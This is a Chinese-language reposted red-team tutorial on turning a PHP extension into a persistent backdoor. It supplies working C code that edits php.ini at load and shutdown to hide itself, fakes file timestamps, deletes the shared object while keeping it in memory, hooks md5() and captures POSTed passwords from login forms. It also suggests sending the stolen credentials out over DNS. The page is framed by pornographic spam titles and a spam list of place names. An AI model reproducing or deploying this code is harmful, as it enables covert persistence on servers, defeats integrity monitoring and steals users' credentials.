亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何修改PHP擴展作為持久后門

發布時間:2021-10-11 10:56:02 來源:億速云 閱讀:121 作者:柒染 欄目:網絡管理

如何修改PHP擴展作為持久后門,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

在我們作為紅隊的運營中,我們研究不同的持久后門方法,因為每種技術都有他的優缺點。選擇通常基于不同情況,因此對于位于外圍的服務器,PHP擴展是一個很棒的選擇。

本文的重點是:

1.如何減少tracks

2.連接PHP函數并從Red Team中提取有用信息

3.攔截GET / POST參數PS:示例在PHP 7環境中進行測試(PHP    5和PHP 7 API內部之間有變化)

0x00 簡介

1.如果在PHP中添加PHP擴展,PHP解釋器將在啟動時加載PHP.ini文件(extension = path / to / our / extension)

2.在PHP擴展中,我們主要關注4個hooks:MINITMSHUTDOWN,以及RINITRSHUTDOWN。當解釋器啟動和停止時,M 以root身份執行(通常)。R 在作為服務器用戶執行。

3.我們可以從請求中讀取HTTP頭并觸發任何操作(例如,執行命令或啟動反向shell)。為了保持對受感染服務器的訪問,PHP擴展是一個非常好的選擇。我們可以使用合法的HTTP請求與這種后門進行交互(如推薦文章中所示),因為防火墻和網絡規則無法檢測到我們。但是想要加載我們的擴展,我們就需要修改php.ini文件重新加載配置。如果未恢復php.ini,那么其大小,哈希和時間戳將不同,操作將公開,藍隊獲勝,我們輸了。當然,php.ini修改應該會被文件完整性檢查器立即檢測到,但實際上SOCs往往忽略這種警報

0x01 php.ini未被修改

我們知道當我們修改了php.ini時會生成一個警報。可是如果當有人SSH連接到服務器,對php.ini進行cat操作,我什么也看不見。進行ls操作,時間戳也是好的。重新啟動服務器只是為了再次檢查沒有發生任何奇怪的事情。我們的后門還活著。這是為什么?

當加載我們的PHP擴展時,我們不需要在php.ini文件中保留“extesion = path/to/our.so”這一行。我們可以程序化地將其恢復到原始狀態。利用MINIT  hook,我們可以刪除添加到php.ini的行,所以當加載擴展時,這個hook將以root(通常)觸發,我們可以編輯php.ini文件而不會出現問題。同樣,我們可以使用MSHUTDOWN插入一段代碼,用于再次將行添加到php.ini中,因此當服務器重新啟動時,將再次添加“extension = ...”行。當加載擴展時,將執行MINIT并關閉cicle。使用這種方法,php.ini文件在大部分時間內都不會顯示任何奇怪的內容。泛型函數可以表示如下:

 / This code sucks
int modifyExtension(int action) {
    char source = NULL;
    char needle = NULL;
    FILE fp;
    size_t newSize;
    fp = fopen(PHPINI, "a+");
    if (fp != NULL) {
        if (action == 1) {
            if (fseek(fp, 0L, SEEK_END) == 0) {
                long bufsize = ftell(fp); // FileSize
                if (bufsize == -1) {
                    return -1;
                }
                source = malloc(sizeof(char )  (bufsize + 1)); // Alloc memory to read php.ini
                if (fseek(fp, 0L, SEEK_SET) != 0) {
                    return -1;
                    free(source);
                }
                newSize = fread(source, sizeof(char), bufsize, fp);
                if (ferror(fp) != 0) {
                    return -1;
                    free(source);
                }           
                else {
                    source[newSize++] = '\0';
                    needle = strstr(source, LOCATION);
                    if (needle != 0) {
                        FILE tmp = fopen("/tmp/.tmpini", "w");
                        fwrite(source, (needle - source - 11), 1, tmp); //11 = len("\nextension=kk.so")
                        fclose(tmp);
                        rename("/tmp/.tmpini", PHPINI);
                    }
                }
                free(source);
            }
            fclose(fp);
        }
        if (action == 0) {
            fwrite("\nextension=", 11, 1, fp);
            fwrite(LOCATION, strlen(LOCATION), 1, fp);
            fclose(fp);
            fprintf(stderr, "[+] Extension added to PHP.INI\n");
        }
    }
    else {
        return -1;
    }
    return 1;
}

這種策略的對應部分是,如果服務器以意外方式被kill,則不會執行`MSHUTDOWN hook`。另一方面,時間戳將被修改,因此我們也需要牢記這一點:

#define PHPINI "/u/know/that/php.ini"
...
struct stat st;
stat(PHPINI, &st);
...// Do changes
new_time.actime = st.st_atime;
new_time.modtime = st.st_mtime;
utime(PHPINI, &new_time);

0x02 第二步

我們介紹了如何恢復php.ini,但是如果我們需要刪除和恢復后門本身(共享對象),由于我們正在以用戶級別工作(如果我們使用rootkit - 例如一個簡單的LKM-我們可以隱藏它)。在加載擴展程序時,我們可以輕松地將其內容保存在內存中,然后刪除該文件。就像是:

//Simple PoC
PHP_MINIT_FUNCTION(PoC)
{
    //Executed when the module is loaded
    // Privilege: root (usually)
    int fd, check;
    struct utimbuf new_time;
    fprintf(stderr, "[+] LOADED\n");
    //1) Calculate size of the file
    struct stat st;
    if (stat(LOCATION, &st) == -1) {
        return SUCCESS;
    }
    filesize = st.st_size;
    //2) Open the file 
    fd = open(LOCATION, O_RDONLY, 0);
    if (fd == -1) {
        return SUCCESS;
    }
    //3) Map file to memory
    mapedFile = mmap(NULL, filesize, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    
    //4) Delete file
    remove(LOCATION);
    
    //5) Get timestamp
    stat(PHPINI, &st);
    //6) Modify php.ini and delete the extension line
    check = modifyExtension(1);
    if (check == -1) {
        fprintf(stderr, "[+] PHP.INI could not be edited\n");
    }
    else {
        fprintf(stderr, "[+] PHP.INI edited\n");
    }
    //7) Fake timestamp
    new_time.actime = st.st_atime;
    new_time.modtime = st.st_mtime;
    utime(PHPINI, &new_time);
...

下一步是使用MSHUTDOWN hook將共享對象從內存寫入文件:

PHP_MSHUTDOWN_FUNCTION(Allocer)
{
    // We write the file again, edit php.ini and fake the timestamp
    if (mapedFile == MAP_FAILED) {
        return SUCCESS;
    }
    
    int check;
    FILE *fp;
    struct utimbuf new_time;
    struct stat st;
    fp = fopen(LOCATION, "w");
    fwrite(mapedFile, 1, filesize, fp);
    fclose(fp);
    munmap(mapedFile, filesize);
    stat(PHPINI, &st);
    new_time.actime = st.st_atime;
    new_time.modtime = st.st_mtime;    
    
    check = modifyExtension(0);
    utime(PHPINI, &new_time);
    return SUCCESS;
}

0x03 第三步

我們現在知道如何留下最小的tracks,并在Tarlogic博客的帖子中解釋了如何與我們的后門進行通信并通過HTTP標頭觸發操作,所以讓我們開始更有趣的事情,比如hooking。作為ReadTeamers,我們渴望獲得進行橫向運動的憑據。如果我們可以在常見的函數中放置一個hook(比如那些用于哈希密碼或用于在數據庫中插入新用戶的函數),我們可以通過DNS解析索引的關鍵信息(如本文)。作為一個簡單的PoC,我們將掛鉤PHP函數md5()。讓我們潛入PHP內部深處!函數符號表作為    HashTable存儲在結構zend_compiler er_globals中:

struct _zend_compiler_globals {
    zend_stack loop_var_stack;
    zend_class_entry active_class_entry;
    zend_string compiled_filename;
    int zend_lineno;
    zend_op_array active_op_array;
    HashTable function_table;  / function symbol table /
...

我我們可以通過CG(編譯器全局)宏訪問`function_table`成員,并搜索函數的地址.由于它是一個HashTable,我們可以使用zend_hash_str_find_ptr來搜索密鑰“md5”。最后,我們只需要修改處理程序(指向函數的地址),使其指向我們的hook。像這樣:

//Placed at MINIT
    ...
    zend_function *orig;
    orig = zend_hash_str_find_ptr(CG(function_table), "md5", strlen("md5"));
    orig->internal_function.handler = zif_md5_hook;
    ...

檢查原始的md5功能代碼:

PHP_NAMED_FUNCTION(php_if_md5)
{
    zend_string *arg;
    zend_bool raw_output = 0;
    PHP_MD5_CTX context;
    unsigned char digest[16];
    ZEND_PARSE_PARAMETERS_START(1, 2)
        Z_PARAM_STR(arg)
        Z_PARAM_OPTIONAL
        Z_PARAM_BOOL(raw_output)
ZEND_PARSE_PARAMETERS_END();
...

要首先創建我們的hook,我們需要使用正確的數據類型和args來定義它。在官方文檔中顯示`PHP_NAMED_FUNCTION`(無論如何)擴展為`void zif_whatever(INTERNAL_FUNCTION_PARAMETERS)`。所以我們的hook必須像這樣創建:

// Test Hook md5
void zif_md5_hook(INTERNAL_FUNCTION_PARAMETERS) {
    php_printf("[+] Hook called\n");
    zend_string *arg;
    zend_bool raw_output = 0;
    ZEND_PARSE_PARAMETERS_START(1, 2)
        Z_PARAM_STR(arg)
        Z_PARAM_OPTIONAL
        Z_PARAM_BOOL(raw_output)
    ZEND_PARSE_PARAMETERS_END();
    php_printf("[+] MD5 Called with parameter: %s", ZSTR_VAL(arg));
}

編譯并執行:

mothra@arcadia:~/php-7.2.8/ext/Allocer| 
?  sudo /usr/local/bin/php  -r "echo md5('kk');"
[+] LOADED
[+] PHP.INI edited
[+] Hook called
[+] MD5 Called with parameter: kk%

0x04嗅探參數

連接juicy函數是獲取信息的一種很好的方式,但如果我們知道通過POST或GET發送的參數(例如登錄表單)存在,那么捕獲這些值要好得多。我們將把代碼放在`RINIT hook`中,因為每次處理請求時都會執行它。為了檢索信息,我們需要在php_variables.c上檢查PHP引擎的工作方式:

...
zval_ptr_dtor_nogc(&PG(http_globals)[TRACK_VARS_POST]);
ZVAL_COPY_VALUE(&PG(http_globals)[TRACK_VARS_POST], &array);
...

因此變量被視為來自`http_globals`的數組。搜索特定值的最簡單方法(例如我們希望對登錄表單中發送的`“pass”`參數進行說明)是從數組中獲取HashTable,然后使用API進行搜索,就像我們之前搜索的那樣md5功能。我們這樣做的魔法函數是HASH_OF:

    zval password;
    zval post_arr;
    HashTable *post_hash;
    post_arr = &PG(http_globals)[TRACK_VARS_POST]; //Array
    post_hash = HASH_OF(post_arr);
    password = zend_hash_str_find(post_hash, "pass", strlen("pass"));
    if (password != 0) {
        php_printf("Password: %s", Z_STRVAL_P(password));
    }

如果我們測試它:

mothra@arcadia:~/php-7.2.8/ext/Allocer| 
?  curl localhost:8888/k.php --data "pass=s0S3cur3"
Password: s0S3cur3

現在,這個密碼可以保存在文件中,或者只是通過DNS發送給我們所擁有的DNS服務器。

0x05 最后的話

PHP擴展是一種強大的方法,可以持久的保存在目標中,當然,這也是開始使用PHP內部的最佳借口。如果你發現這篇文章有用,或者指出我的錯誤,請通過twitter @TheXC3LL與我聯系。

關于如何修改PHP擴展作為持久后門問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

php
AI

勃利县| 丹东市| 二手房| 顺义区| 小金县| 天等县| 依兰县| 安远县| 宝应县| 库伦旗| 西乡县| 宁津县| 河北区| 蕉岭县| 呼和浩特市| 石柱| 新安县| 通化市| 册亨县| 抚远县| 洛浦县| 仙桃市| 乌鲁木齐县| 洪湖市| 固阳县| 双辽市| 富锦市| 新宁县| 古浪县| 达孜县| 乌兰县| 仪陇县| 阆中市| 平邑县| 翁牛特旗| 高邮市| 苗栗市| 博乐市| 广元市| 长岛县| 健康|